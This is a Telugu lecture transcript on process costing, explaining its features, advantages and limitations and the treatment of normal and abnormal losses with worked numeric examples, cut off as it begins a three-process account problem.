ఈ అంశాల్లో అతి ముఖ్యమైనటువంటి అంశాలు ఏంటున్నాయి ఒకటి మనం చూసినట్లయితే, ముందుగా మనం ప్రాసెస్ కాస్టింగ్ ప్రాథమిక అంశాల గురించి చూద్దాం. ప్రాసెస్ కాస్టింగ్ ఏ పరిశ్రమల్లో అవలంబిస్తారు అన్నది కానీ ఒకసారి చూసినట్లయితే, అసలు ప్రాసెస్ కాస్టింగ్ అంటే ఏంటి ఒకసారి చూద్దాం. కొన్ని పరిశ్రమల్లో వస్తూత్పత్తి దశల వారీగా జరుగుతూ ఉంటుంది. ఒక్కొక్క దశను ఒక్కొక్క ప్రాసెస్ అంటాం. ఈ తరహా పరిశ్రమలను ప్రాసెస్ పరిశ్రమలు అంటారు. ఈ పరిశ్రమల్లో అనుసరించేటటువంటి కాస్టింగ్ను ప్రాసెస్ కాస్టింగ్ అంటాం. ఈ ప్రాసెస్ కాస్టింగ్ అనేటటువంటి పద్ధతిని మనం అవలంబించాలి అంటే ఖచ్చితంగా ఆ పరిశ్రమలోని వస్తూత్పత్తి అనేది దశల వారీగా జరుగుతూ ఉండాలి. అలా దశల వారీగా జరుగుతున్నటువంటి పరిశ్రమల్లోనే ఈ ప్రాసెస్ కాస్టింగ్ అనేది అమలు చేయడం జరుగుతూ ఉంటుంది. ఈ ప్రాసెస్ కాస్టింగ్లో ఉండేటటువంటి ఏ పరిశ్రమలు ఉన్నాయి ఒకసారి మనం చూసినట్లయితే, ప్రాసెస్ కాస్టింగ్ అవలంబించేటటువంటి పరిశ్రమలు చూస్తే నూనె శుద్ధి కర్మాగారాలు, రసాయనిక పరిశ్రమలు, రంగుల పరిశ్రమలు, సిమెంట్ పరిశ్రమలు, పంచదార పరిశ్రమలు, కాగితపు పరిశ్రమలు, అలాగే సబ్బుల పరిశ్రమలు, బిస్కెట్ల పరిశ్రమలు, వస్త్ర పరిశ్రమలు, పాడి వస్తువుల పరిశ్రమలు, మాంసపు పరిశ్రమలు, కలప పరిశ్రమ, బంగారం పరిశ్రమ, ఔషధాల పరిశ్రమ. ఈ పరిశ్రమలు కానీ ఉత్పత్తి కానీ ఒకసారి కానీ మనం చూసినట్లయితే, ఈ పరిశ్రమల్లో తయారయ్యే ఉత్పత్తి దశల వారీగా జరుగుతూ ఉంటుంది. ప్రతి దశకు ఒక ప్రాసెస్ అంటారు. ఆ ప్రాసెస్కి ఒక ఖాతాని ఏర్పాటు చేయడం జరుగుతుంది. ఆ ప్రాసెస్కి అయ్యేటటువంటి వ్యయాన్ని ప్రత్యేకంగా లెక్కిస్తారు. ఈ పద్ధతినే ప్రాసెస్ కాస్టింగ్ అంటారు. ఈ ప్రాసెస్ కాస్టింగ్ అవలంబించేటటువంటి పరిశ్రమ యొక్క లక్షణాలు కానీ మీరు చూసినట్లయితే, ఈ పరిశ్రమలో ముఖ్యంగా ఉత్పత్తి ప్రక్రియ ఏ విధంగా ఉంటుంది అంటే అవిచ్ఛిన్నంగా కొనసాగుతుంది. అంటే దీని అర్థం ఏంటంటే, ఉత్పత్తి ఒకసారి అంటే ఈ పరిశ్రమలో ఉత్పత్తి ప్రక్రియ అవిచ్ఛిన్నంగా కొనసాగాలి. అలాగే రెండోది, ఫ్యాక్టరీ మొత్తాన్ని కొన్ని ప్రాసెస్లుగా విభజించడం జరుగుతూ ఉంటుంది. అలాగే వ్యయం లెక్కించేటప్పుడు ఒక్కొక్క ప్రాసెస్కి ఎంత వ్యయమైంది లెక్కిస్తారు. 4వ వచ్చిన తర్వాత యూనిట్ వ్యయము కనుగొనడం జరుగుతూ ఉంటుంది. ప్రాసెస్ మొత్తం వ్యయాన్ని ఆ ప్రాసెస్లో ఉత్పత్తి అయినటువంటి వస్తువుల సంఖ్యతో భాగిస్తే యూనిట్ వ్యయం అనేది ఈజీగా మనం లెక్కించవచ్చు. అదేవిధంగా ఒక ప్రాసెస్లో తయారైన సరుకు ఆ తర్వాత ప్రాసెస్కి ముడి సరుకు అవుతుంది. ప్రాసెస్ కాస్టింగ్లో ముఖ్యమైనటువంటి లక్షణం ఏంటంటే, ఒక ప్రాసెస్లో తయారైనటువంటి వస్తువు రెండో ప్రాసెస్కి ముడి సరుకుగా వెళ్ళడం జరుగుతుంది. చివరి ప్రాసెస్లో పూర్తిగా తయారైనటువంటి సరుకు మనకు బయటికి రావడం జరుగుతూ ఉంటుంది. ఇది అతి ముఖ్యమైనటువంటి లక్షణం. అలాగే 6వ లక్షణం కానీ మనం చూసినట్లయితే, ప్రతి ప్రాసెస్లోనూ ఉత్పత్తి అయిన వస్తువులు ఒకే రకంగా ఉంటాయి మరియు ప్రామాణికంగా ఉంటాయి. అంటే
వివిధ దశలు ఉంటాయనుకున్నాం. ప్రతి దశలో తయారైన వస్తువు ఒకే విధంగాను అత్యంత ప్రామాణికంగాను ఉంటాయి. ఈ లక్షణాలు ప్రాసెస్ కాస్టింగ్కి ఉంటాయి. అలాగే ఈ ప్రాసెస్ కాస్టింగ్లో మనకి వచ్చేటటువంటి ప్రయోజనాలు ఒకసారి చూద్దాం. ఈ ప్రాసెస్ కాస్టింగ్లో ఏ ఏ ప్రయోజనాలు ఉన్నాయి? ఒక నిర్ణీత కాలానికి నిర్ణయించవచ్చు. దీనివల్ల అనేక ప్రయోజనాలు మనకి ఉన్నాయి. ఆ ప్రయోజనాలు ఒక్కొక్కటి మనం విశ్లేషిద్దాం. రెండవ ప్రయోజనం, ఉత్పత్తి వ్యయాలు నియంత్రణ చేయడం చాలా సులభం. ఉత్పత్తి వ్యయాలని నియంత్రణ చేయడం చాలా సులభం. ఎందుకంటే ఒక్కొక్క ప్రాసెస్లో అయినటువంటి వ్యయం ఎంత అయింది అన్నది మనకి ఈజీగా లెక్కగట్టగలం. ఏ ప్రాసెస్లో ఎంత వృధా అవుతుంది, ఏ ప్రాసెస్లో ఎంత నష్టం అవుతుంది మనకి తెలుస్తుంది. కాబట్టి ఆ ప్రాసెస్ మీద ప్రత్యేకమైనటువంటి శ్రద్ధ పెట్టి నియంత్రణ చేసి ఆ ప్రాసెస్లో అయ్యేటటువంటి మొత్తం వ్యయాన్ని మనం నియంత్రించేటటువంటి అవకాశం ఉంటుంది. అలాగే ఖర్చులు, వివిధ ప్రాసెస్ల మధ్య అయినటువంటి ఖర్చులు సులభంగా ప్రతి ప్రాసెస్కి కేటాయించడానికి వీలుగా ఉంటుంది. సో కామన్గా అయిన ఖర్చులను కూడా ప్రతి ప్రాసెస్కి ఏ విధంగా పంచాలి అనేటటువంటి అవకాశం ఇందులో ప్రాసెస్ కాస్టింగ్లో మనకుంది. ఈ ప్రాసెస్ కాస్టింగ్లో అత్యంత ముఖ్యమైన ప్రయోజనం ఏంటి అంటే ధర కొటేషన్స్ సులభంగా ఇవ్వచ్చు. ఎవరైనా ఒక కస్టమర్ ఒక ఆర్డర్ పెడితే సో వాళ్ళకి ఆ వస్తువులు ఏ విధంగా మనం సప్లై చేయగలం, ఏ ధరకు మనం సప్లై చేయగలం, ఎంత ప్రామాణికమైన ధరకు మనం సప్లై చేయగలం, ఖచ్చితత్వంతో ఈ ధర కొటేషన్స్ ఇవ్వగలిగేటటువంటి అవకాశం ప్రాసెస్ కాస్టింగ్లో ఉంది. అయితే ప్రాసెస్ కాస్టింగ్లో కూడా కొన్ని రకాలైనటువంటి లోపాలు ఉన్నాయి. ఆ లోపాలు ఏంటి ఒకసారి మనం చూద్దాం. లోపాలు చూసినట్లయితే మొట్టమొదటి లోపం, ప్రాసెస్ కాస్టింగ్లో తక్కువ వస్తువులు ఉత్పత్తి చేస్తే పర్వాలా, అలా కాకుండా ప్రాసెస్ కాస్టింగ్లో తయారైనటువంటి వస్తువులు అధిక వస్తువులు కానీ తయారు చేస్తే వాటి వ్యయాలు కనుక్కోవడం కష్టతరం అవుతుంది. అసాధ్యమేమీ కాదు కానీ చాలా క్లిష్టతరమైనది అని మనం ఇక్కడ చెప్పుకోవచ్చు. కాబట్టి ప్రాసెస్ కాస్టింగ్లో మనం తక్కువ రకాల వస్తువులు తయారు చేసే పరిశ్రమలకి ప్రాసెస్ కాస్టింగ్ అప్లై చేసుకుంటే అత్యద్భుతమైనటువంటి ఫలితాలు వస్తాయి. అలాగే రెండో లోపం ఏంటంటే ఉమ్మడి వస్తువులు. ప్రాసెస్లో అన్ని ప్రాసెస్లకి సంబంధించిన కొన్ని కామన్ ఖర్చులు ఉమ్మడి వస్తువుల మధ్య పంపిణీ చేయడం ఆమోదయోగ్యమైన ప్రాతిపదిక లేదు. ఒక్కొక్క పరిశ్రమ ఒక్కొక్క ప్రాతిపదికని అవలంబించడం వలన ఒకే రకమైనటువంటి పరిశ్రమలో వివిధ రకాలైనటువంటి వ్యయాలు వచ్చేటటువంటి అవకాశం ఉంది. మూడోది, కొనసాగుతున్న పని విలువను లెక్కించడం చాలా కష్టం. ఇక్కడ కొనసాగుతున్న పని అంటే ఏంటంటే ముడి పదార్థాల దశ నుంచి పూర్తిగా తయారైన దశకు వెళ్ళేటప్పటికి మధ్యలో ఉండే దశ ఉంటుంది. ఆ దశని ఇది పూర్తిగా ముడి పదార్థాలు కావు, అలాగని పూర్తిగా తయారైన వస్తువు కాదు, మధ్యలో ఉండేటటువంటి ఈ దశని కొనసాగుతున్న పని అంటాం. ఈ కొనసాగుతున్న పని విలువని లెక్కించడం చాలా కష్టం.
మనం ప్రాసెస్ కాస్టింగ్లోని ప్రాథమిక అంశాల గురించి చర్చించాం. ఇప్పుడు ప్రాసెస్ కాస్టింగ్లో వచ్చేటటువంటి నష్టాల గురించి ఒకసారి చూద్దాం. ప్రాసెస్ కాస్టింగ్లో వివిధ ప్రక్రియల్లో వస్తూత్పత్తి జరుగుతున్నప్పుడు సాధారణంగా కొన్ని రకాలైనటువంటి నష్టాలు సంభవిస్తూ ఉంటాయి. ఈ నష్టాలు మనం 2 రకాలుగా వర్గీకరించడం జరిగింది. వస్తువులు వివిధ ప్రాసెస్లో తయారయ్యేటప్పుడు నష్టాలు సంభవించడం జరుగుతూ ఉంటుంది. ఈ నష్టాలు కాస్టింగ్ విభాగం వారు నమోదు చేసి నియంత్రించడానికి అవసరమైనటువంటి చర్యలు తీసుకోవాలి. దీంట్లో భాగంగా వివిధ ప్రాసెస్ల్లో ఏ రకమైనటువంటి నష్టాలు ఏర్పడ్డాయి అనేవి క్లియర్గా చూడడం జరుగుతుంటుంది. ఇలా ఏర్పడినటువంటి మొత్తం నష్టాలని సాధారణ నష్టాలు, అసాధారణ నష్టాలుగా విభజించడం జరుగుతుంది. ప్రాసెస్ల్లో వచ్చే మొత్తం నష్టాలని 2 రకాలుగా విభజిస్తారు. 1 సాధారణ నష్టం, 2 అసాధారణ నష్టం. ఇప్పుడు సాధారణ నష్టం అంటే ఏంటి చూద్దాం. సాధారణ నష్టం పేరులోనే మనకుంది. సర్వసాధారణంగా సరుకు యొక్క స్వభావ సిద్ధమైనటువంటి లక్షణాల వలన ఏర్పడినటువంటి నష్టమే సాధారణ నష్టం. ఇది సరుకు స్వభావం అంటే కొన్ని రకాల వస్తువులు ఆవిరయ్యేటటువంటి గుణం ఉంటుంది. కొన్ని రకాలైనటువంటి వస్తువులు రసాయనిక చర్యకు లోబడి సరుకు తాలూకా విలువ తగ్గడం జరుగుతుంది. అలాగే పరిశ్రమల్లో వస్తువులు శాంపిల్కై తీసేటప్పుడు ఆ విలువ కూడా తగ్గుతూ ఉంటుంది. ఇలాంటి కారణాల వల్ల సరుకులో సంభవించేటటువంటి నష్టాల్ని స్వాభావికమైనటువంటి లక్షణాల వలన ఏర్పడినటువంటి నష్టమే సాధారణ నష్టంగా మనం భావించవచ్చు. అలా కాకుండా ఇతరత్ర కారణాలు అంటే అజాగ్రత్తల వలన కానీ లేదా యాజమాన్య లోపాల వలన కానీ జరిగేటటువంటి లోపాల వలన వచ్చే నష్టం అసాధారణ నష్టం అంటారు. అది మనం తర్వాత చూద్దాం. ప్రస్తుతం సాధారణ నష్టం వచ్చినప్పుడు ఏ విధంగా లెక్కించాలి, సాధారణ నష్టాన్ని ఎవరు భరించాలి అనేటటువంటి అంశం చూసినట్లయితే ఇప్పుడే మనం అనుకున్నాం సాధారణ నష్టం అనేది సరుకు యొక్క సహజ స్వభావ సిద్ధంగా కారణాల వలన ఏర్పడినటువంటి నష్టం. ఈ నష్టాన్ని ఏ విధంగా లెక్కించాలి? ఈ నష్టం యొక్క భారము వినియోగదారుల మీదే పడుతుంది. ఎందుకంటే సాధారణ నష్టము వలన ఉత్పత్తి వ్యయము పెరిగి యూనిట్ వ్యయం కూడా పెరిగి తదుపరి వస్తు ధర పెరిగి వినియోగదారుడు ఆ భారాన్ని భరించవలసినటువంటి అవసరం ఉంటుంది. ఇక్కడ ఒకసారి గమనించినట్లయితే సాధారణ నష్టాన్ని ఏ ప్రాసెస్లో వచ్చిందో గమనించి ఆ ప్రాసెస్ ఉత్పత్తిలో వ్యయంగా భావించి దానికి మనకి చూపించడం జరుగుతూ ఉంటుంది. సాధారణ నష్టం ముందుగా ఏ ప్రాసెస్లో ఏర్పడిందో గమనించి ఆ ప్రాసెస్లో అయినటువంటి ఉత్పత్తి వ్యయంలో భాగంగా సాధారణ నష్టాన్ని పరిగణించడం జరుగుతుంది. ఎప్పుడైతే సాధారణ నష్టాన్ని ఉత్పత్తి వ్యయంలో భాగంగా పరిగణించామో ఉత్పత్తి వ్యయం పెరుగుతుంది, తద్వారా యూనిట్ వ్యయం పెరుగుతుంది. యూనిట్ వ్యయం పెరిగింది అంటే ఆ వ్యయం యొక్క భారము వినియోగదారుడు భరించవలసినటువంటి అవసరం ఉంటుంది. ఇక్కడ మన సాధారణ నష్టం లెక్కింపు ఒక ఉదాహరణ ద్వారా చూద్దాం. ఒక సంస్థలో 1000 యూనిట్లు తయారయ్యి అనుకున్నాం అనుకోండి. ఒక్కొక్క యూనిట్ తయారీకి 10 రూపాయలు ఖర్చు అయింది. ఈ సందర్భంలో 1000 యూనిట్లకి ఒక్కొక్క యూనిట్కి 10 రూపాయలు అయితే మొత్తం ఉత్పత్తి వ్యయం 10,000 రూపాయలు. ఇక్కడ సాధారణ నష్టం 10 యూనిట్లు ఏర్పడింది అనుకున్నట్లయితే ఈ సాధారణ నష్టాన్ని ఏ విధంగా భావిస్తారు అంటే ముందుగా 1000 యూనిట్లు కదా ఉత్పత్తి అయ్యాయి. ఈ 1000 యూనిట్లలోంచి 10 యూనిట్లు ఏర్పడినటువంటి సాధారణ నష్టాన్ని మినహాయిస్తారు. అంటే ఇప్పుడు మన దగ్గర ఉన్నటువంటి యూనిట్లు 990 యూనిట్లు మాత్రమే. ఉత్పత్తి వ్యయం 10,000 రూపాయలు తీసుకోవడం జరుగుతుంది. అంటే ఇక్కడ మీరు గమనించవలసింది సాధారణ నష్టం ఏర్పడక ముందు 1000 యూనిట్లు 10,000 రూపాయలు అయితే సాధారణ నష్టం ఏర్పడిన తర్వాత 990 యూనిట్లు 10,000 రూపాయలుగా మారడం జరిగింది. అంటే ఇక్కడ ఏం జరిగింది? ఉత్పత్తి వ్యయము ఏదైతే 10 యూనిట్లకి అయిందో అది ఉత్పత్తి వ్యయంలో భాగంగా చూపించడం వలన ఒక వస్తువు 10 రూపాయలకు రావాల్సినటువంటి వస్తువు సాధారణ నష్టం ఏర్పడడం వల్ల ఇక్కడ మనకి 10 రూపాయలు 10 పైసలుగా అవుతుంది. ఎందుకంటే
మొత్తం ఉత్పత్తి వ్యయం 10,000 రూపాయలుగా భావిస్తే ఉత్పత్తి అయిన యూనిట్లు సాధారణ నష్టం మినహా 990 యూనిట్లు ఉంది. 10,000/990 కానీ చేసినట్లయితే యూనిట్ వ్యయము 10 రూపాయల 10 పైసలుగా అయినది. అంటే సాధారణ నష్టం ఏర్పడడం వల్ల 10 రూపాయలకు రావాల్సినటువంటి వస్తువు 10 రూపాయలు 10 పైసలుగా నిర్ణయం అవుతుంది. కాబట్టి దీని యొక్క భారము వినియోగదారుడి మీదే పడుతుంది. సాధారణ నష్ట భారం వినియోగదారుడి మీద పడుతుంది. సో సాధారణ నష్టం వల్ల ఉత్పత్తి వ్యయం పెరిగి ఈ రకమైనటువంటి యూనిట్ ధర పెరిగి ఈ భారాన్ని వినియోగదారుడు తీసుకోవాల్సినటువంటి అవసరం ఉంది. అలాగే ఇందాక చర్చించినట్లు ప్రాసెస్ ఖాతాలో వచ్చేటటువంటి నష్టాలని సాధారణంగా 2 రకాల నష్టాలుగా మనం వర్గీకరిస్తాం. మొట్టమొదటిది సాధారణ నష్టం, రెండవది అసాధారణ నష్టం. సాధారణ నష్టం గురించి ఆల్రెడీ చర్చించాం. సహజ సిద్ధమైన సరుకు యొక్క స్వాభావిక కారణాల వలన ఏర్పడిన నష్టం సాధారణ నష్టం అనుకున్నాం. సాధారణ నష్టం వల్ల ఏర్పడిన నష్టాన్ని ఉత్పత్తి వ్యయం పెంచి తద్వారా వినియోగదారుల మించి స్వీకరించడం జరుగుతుంటుంది. ఇప్పుడు అసాధారణ నష్టం అంటే ఏంటి? అసాధారణ నష్టం వల్ల ఉత్పత్తిపై ఏమైనా ప్రభావం ఉంటుందా? ఈ అసాధారణ నష్టాన్ని ఎవరు భరించాలి అనేటటువంటి అంశం ఇప్పుడు ఒకసారి మనం చర్చిద్దాం. పేరులోనే ఉంది అసాధారణ నష్టం. అసాధారణ నష్టం అంటే అసాధారణ కారణాల వలన ఏర్పడినటువంటి నష్టం. ఈ నష్టం ఏ కారణాలు ఒక్కసారి ఉదాహరణ చూస్తే, నాసిరకమైనటువంటి ముడి పదార్థాలు వాడడం వల్ల, యాజమాన్యం యొక్క అసమర్థత వలన, అగ్ని ప్రమాదాల వలన, ఇటువంటి అసాధారణ పరిస్థితుల వలన, లేదైనా అజాగ్రత్తల వలన, లేదా యంత్రాలు పాడైపోవడం లేదా చెడిపోవడం, ఇటువంటి కారణాల వలన ఉత్పత్తి ఆగిపోయి తద్వారా వచ్చినటువంటి నష్టాన్ని అసాధారణ నష్టంగా పరిగణించడం జరుగుతుంది. ఈ అసాధారణ నష్టాన్ని సరైన జాగ్రత్తలు కానీ మనం తీసుకున్నట్లయితే ఇవి ఏర్పడకుండా చేయగలిగేటటువంటి అవకాశం ఉంది. కాబట్టి ఈ అసాధారణ నష్టం జాగ్రత్తలు తీసుకోకపోవడం వలన ఏర్పడినటువంటి నష్టాలు. కాబట్టి ఈ అసాధారణ నష్టం ఏ సంస్థలో అయితే ఏర్పడ్డాయో ఆ సంస్థ మాత్రమే భరించవలసినటువంటి అవసరం ఉంది. ఈ అసాధారణ నష్టాన్ని ఏ విధంగా లెక్కిస్తారు అని కానీ ఒక ఉదాహరణ ద్వారా కానీ మనం చూసినట్లయితే, అసాధారణ నష్టం లెక్కింపు. అసాధారణ నష్టం ఉత్పత్తి వ్యయాన్ని ప్రభావితం చేయరాదు. ఎందుకంటే సాధారణ నష్టం అయితే సహజసిద్ధమైన లక్షణాల వల్ల ఏర్పడింది కాబట్టి ఆ నష్టం భర్తీ చేయాలి అంటే వినియోగదారుల నుంచి ఉత్పత్తి వ్యయం రూపంలో తీసుకోవడం, ధర రూపంలో తీసుకోవడం జరుగుతుంది. కానీ అసాధారణ నష్టం అసాధారణ కారణాల వల్ల, అజాగ్రత్తల వలన ఏర్పడినటువంటి నష్టం. ఈ నష్టం యొక్క భారం వినియోగదారుల మీద వేయడానికి ఎంత మాత్రమూ సమంజసం కాదు. కాబట్టి ఈ అసాధారణ నష్టాన్ని ఎంతైందో లెక్కించి ఉత్పత్తి వ్యయాన్ని ప్రభావితం చేయకుండా యూనిట్ ధరను నిర్ణయించవలసినటువంటి అవసరం ఉంది. సో ఈ అసాధారణ నష్టాన్ని లెక్కించడానికి ఇక్కడ ఒక ఫార్ములా ఇచ్చాం. ఒకసారి ఆ ఫార్ములా కానీ చూసినట్లయితే, అసాధారణ నష్టము ఈజ్ ఈక్వల్ టు ప్రాసెస్ ఉత్పత్తి వ్యయము మైనస్ సాధారణ నష్టం విలువ డివైడెడ్ బై ప్రవేశపెట్టిన యూనిట్లు మైనస్ సాధారణ నష్టం యూనిట్లు ఇంటూ అసాధారణ నష్టం యూనిట్లు. ఈ సూత్రం కానీ మీరు ఫాలో అయినట్లయితే అసాధారణ నష్టం లెక్కించవచ్చు. ఉదాహరణకి ఒక సంస్థలో 10,000 యూనిట్లు తయారయ్యే అనుకుందాం. 10,000 యూనిట్లు తయారవడం వలన అందులో 10 యూనిట్లు సాధారణ నష్టం అనుకోండి. మిగతా ప్రాసెస్లో ఇంకొక 10 యూనిట్లు అసాధారణ నష్టం ఏర్పడింది అనుకుందాం. ఇప్పుడు అసాధారణ నష్టం ఏ విధంగా లెక్కించాలి అంటే, ముందు ప్రాసెస్కి అయినటువంటి మొత్తం ఉత్పత్తి వ్యయం ఎంత లెక్కించి ఆ ఉత్పత్తి వ్యయంలో సాధారణ నష్టంకి ఏదైనా రద్దు విలువ కానీ ఉన్నట్లయితే సాధారణ నష్టం విలువ తీసేయాలి. తీసేస్తే మనకి ఉత్పత్తి వ్యయం వస్తుంది. ఎప్పుడైతే ఈ ఉత్పత్తి వ్యయం వచ్చిందో, ఎన్ని యూనిట్లు ఉత్పత్తి చేశామో అందులోంచి సాధారణ నష్టం యూనిట్లు తీసేసి మిగిలిన యూనిట్లు ఎన్నైతే ఉన్నాయో అన్ని యూనిట్లు తీసుకోవడం జరుగుతుంది. ఇంటూ అసాధారణ నష్టం ఎన్ని యూనిట్లు అయితే అయ్యిందో, అసాధారణ నష్టం 10 యూనిట్లు అయితే 10 యూనిట్లు కానీ వేసినట్లయితే అసాధారణ నష్టం విలువ వస్తుంది. ఈ విషయం మనం ఒక ఉదాహరణ ద్వారా చూసినట్లయితే మీకు క్లియర్గా అర్థమవుతుంది. ఇక్కడ చూడండి, ఒక సంస్థలో 1000 యూనిట్లు తయారయ్యి అనుకుందాం. తయారైన తర్వాత ఈ 1000 యూనిట్లు తయారవడానికి యూనిట్కి 10 రూపాయలు వ్యయం అయింది. అయితే
ఇప్పుడు మొత్తం ఉత్పత్తి వ్యయం ఎంత అవుతుంది? 1000 యూనిట్లు ఇంటూ 10 రూపాయలు ఉత్పత్తి వ్యయం, 10,000 రూపాయలు మొత్తం ఉత్పత్తి వ్యయం అయింది. ఇక్కడ అసాధారణ నష్టం ఒకటి జరిగింది అనుకోండి, 10 యూనిట్ల అసాధారణ నష్టం జరిగింది. ఇక్కడ అసాధారణ నష్టం విలువ ఏ విధంగా లెక్కించాలి? ఇక్కడ మొత్తం ఉత్పత్తి వ్యయము 1000 యూనిట్లకి 10,000 అయింది, అసాధారణ నష్టం 10 యూనిట్లు అయింది. అంటే ఇక్కడ అసాధారణ నష్టం కాబట్టి ఉత్పత్తి వ్యయాన్ని ఎట్టి పరిస్థితుల్లో కూడా ఈ అసాధారణ నష్టం యూనిట్ల వల్ల పెంచడానికి వీల్లేదు. కాబట్టి ఇక్కడ ఏం చేస్తారు అంటే, ఇక్కడ ఉత్పత్తి వ్యయాన్ని 990 యూనిట్లకు 9,900 రూపాయలుగా పరిగణించడం జరుగుతుంది. అంటే ఇప్పుడు మీకు ఈ ఉదాహరణ చూస్తే యూనిట్ వ్యయము 9,900 రూపాయల ఉత్పత్తి వ్యయము, 990 యూనిట్లు ఉత్పత్తికి 10 రూపాయలు అయింది. అంటే ఇక్కడ గమనించవలసిన అంశం, ఒకసారి వెనక్కి కానీ వెళ్ళినట్లయితే, అసాధారణ నష్టం ఏర్పడకముందు ఒక యూనిట్ యొక్క వ్యయము 10 రూపాయలు ఉంది. అదే అసాధారణ నష్టం ఏర్పడిన తర్వాత కూడా యూనిట్ వ్యయము 10 రూపాయలు ఉంది. అంటే దీన్ని బట్టి మనం అర్థం చేసుకోవాల్సినటువంటి అంశం ఏంటి అంటే, అసాధారణ నష్టం యొక్క భారము వినియోగదారుడిపై పడదు. ఎందువలనంటే అసాధారణ నష్టం సంస్థ భరిస్తుంది. అందువలన ఉత్పత్తి వ్యయము పెరగదు, యూనిట్ ధర పెరగదు. ఇక్కడ మీరు క్లియర్గా సాధారణ నష్టం లెక్కింపు, అసాధారణ నష్టం లెక్కింపు, ఈ రెండిట్ల మధ్య వ్యత్యాసం తెలుసుకోవాలి. ఇక్కడ నేను ఇచ్చిన ఉదాహరణలో ఓన్లీ సాధారణ నష్టం ఏర్పడితే ఏం చేయాలి, ఓన్లీ అసాధారణ నష్టం ఏర్పడితే ఏం చేయాలి చెప్పాను. ప్రాక్టికల్గా వచ్చేటప్పటికి రెండు నష్టాలు కూడా ఏర్పడేటటువంటి అవకాశం ఉంది. సాధారణ నష్టం ఏర్పడవచ్చు, అసాధారణ నష్టం ఏర్పడవచ్చు. ఈ సందర్భంలో ఏం చేయాలి? ముందుగా సాధారణ నష్టం విలువని యూనిట్లలోంచి తీసి, ఎన్ని యూనిట్లు అయితే నష్టం జరిగింది యూనిట్లోంచి మినహాయించి అక్కడ దాకా అయినటువంటి ఉత్పత్తి వ్యయాన్ని లెక్కించాలి. తదుపరి అసాధారణ నష్టం విలువ మనం లెక్కించవలసినటువంటి అవసరం ఉంది. ఒకసారి విద్యార్థులు గమనించినట్లయితే ఈ భాగంలో మనం ఏం నేర్చుకున్నామంటే, ప్రాసెస్ నిరంతర ప్రక్రియ జరుగుతున్నప్పుడు ఇటువంటి ప్రాసెస్ల్లో నష్టాలు సంభవిస్తూ ఉంటాయి. ఈ నష్టాలని మనం రెండు రకాలుగా మనం వర్గీకరించడం జరిగింది. ఒకటి సాధారణ నష్టం, రెండు అసాధారణ నష్టం. సాధారణ నష్టం స్వభావ సిద్ధమైనటువంటి కారణాల వలన ఏర్పడేటటువంటి నష్టం. సరుకు ఆవిరైపోవడం కానీ, సరుకులో ఉండేటటువంటి సహజ లక్షణం అనేటువంటి రసాయనిక చర్యల వల్ల కానీ, శాంపిల్స్ వల్ల కానీ అయినటువంటి నష్టం సాధారణ నష్టంగా పరిగణించాలి. అలాగే అసాధారణ నష్టం అసాధారణ కార్యాల వల్ల, అంటే యంత్రాలు చెడిపోవడం, సరైనటువంటి ముడి పదార్థాలు వాడకపోవడం, వీటి వల్ల వచ్చేటటువంటి నష్టం. సాధారణ నష్టం వల్ల ఏర్పడినటువంటి నష్టం, దీని యొక్క భారం వినియోగదారులపై పడుతుంది. అసాధారణ నష్టం వల్ల వచ్చినటువంటి ఏదైతే ఉందో ఆ భారం సంస్థ మాత్రమే భరిస్తుంది. సాధారణ నష్టం వల్ల ఉత్పత్తి వ్యయము పెరుగుతుంది. అసాధారణ నష్టం వల్ల నెక్స్ట్ సెషన్లో మనం నేర్చుకుంటాం. ఇప్పుడు మూడో భాగం, ప్రాసెస్ కాస్టింగ్ ప్రాక్టికల్ ప్రాబ్లమ్స్ సింపుల్ ఉదాహరణలతో మనం చూద్దాం. ఇప్పుడు దాకా మనం ప్రాసెస్ కాస్టింగ్లో ప్రాథమిక అంశాల గురించి తెలుసుకున్నాం, ప్రాసెస్ కాస్టింగ్లో వచ్చేటటువంటి నష్టాల గురించి తెలుసుకున్నాం. వీటి ఆధారంగా మనం ప్రాసెస్ ఖాతా ఎలా వేయాలి, ఏ విధంగా వేయాలి అన్నది మనం ఒక ప్రాక్టికల్ ఉదాహరణలతో మనం చూద్దాం. ఇక్కడ మీరు కానీ ఈ ప్రశ్న కానీ చూసినట్లయితే, ఒక వస్తువు తయారీకి 3 ప్రాసెస్ల ద్వారా జరుగుతుంది. వేతనాల నిష్పత్తిలో పరోక్ష ఖర్చులను 8,500 రూపాయలను విభజించవలను. నెల ప్రారంభంలో కానీ చివరకు కానీ సరుకు నిల్వ,
కొనసాగుతున్న పని నిల్వ ఏమీ లేదు. క్రింది సమాచారంతో ఒక్కొక్క ప్రాసెస్ యొక్క ధరను 2019 ఆగస్టుకు సంబంధించినవి లెక్కగట్టము. ఈ ప్రశ్నలో మీరు కానీ గమనించినట్లయితే ఒక వస్తువు తయారీకి 3 ప్రాసెస్లు ఉన్నాయని మీకు అర్థమవుతుంది. అలాగే ఉమ్మడి ఖర్చులు ఒక 8,500 రూపాయలు ఇవ్వడం జరిగింది. ఈ ఉమ్మడి ఖర్చుల్ని ఏ ప్రాతిపదిక మీద పంచాలి అనేది కూడా చెప్పడం జరిగింది. ప్రతి ప్రాసెస్లో ఉండేటటువంటి వేతనాల నిష్పత్తిలో ఈ ఉమ్మడి పరోక్ష ఖర్చులు 8,500ని విభజించాలి అని చెప్పారు. ఈ సమాచారంతో పాటు అదనపు సమాచారం కూడా ఇచ్చారు. దాని ఆధారంగా ప్రాసెస్ ఖాతాని ఏ విధంగా తయారు చేయాలి మనం చూద్దాం. ప్రాసెస్ ఖాతాను తయారు చేయడానికి ముందుగా ప్రాసెస్ ఖాతా నమూనా ఏ విధంగా ఉంటుంది? సాధారణమైనటువంటి ఖాతాలాగే ప్రాసెస్ ఖాతా కూడా డెబిట్, క్రెడిట్ ఉండడం జరుగుతూ ఉంటుంది. డెబిట్లో ఏ అంశాలు వస్తాయి ప్రాసెస్ ఖాతాలో అని కానీ చూసినట్లయితే, ముందుగా ఏ ప్రాసెస్ ఖాతా మనం తయారు చేస్తున్నామో ఆ ప్రాసెస్ ఖాతాలో మెటీరియల్, ప్రవేశపెట్టబడినటువంటి మెటీరియల్ని ప్రాసెస్ ఖాతాలో డెబిట్ వైపు రాయవలసినటువంటి అవసరం ఉంది. ప్రాసెస్ ఖాతాలో డెబిట్ వైపు రాసే అంశాలన్నీ కూడా ఉత్పత్తి వ్యయాన్ని పెంచేటటువంటి అంశాలు ఉంటాయి. ప్రాసెస్ ఖాతాలో డెబిట్ వైపు ముందుగా మెటీరియల్స్ రాసిన తర్వాత వేతనాలు, ప్రత్యక్ష ఖర్చులు, పరోక్ష ఖర్చులు, 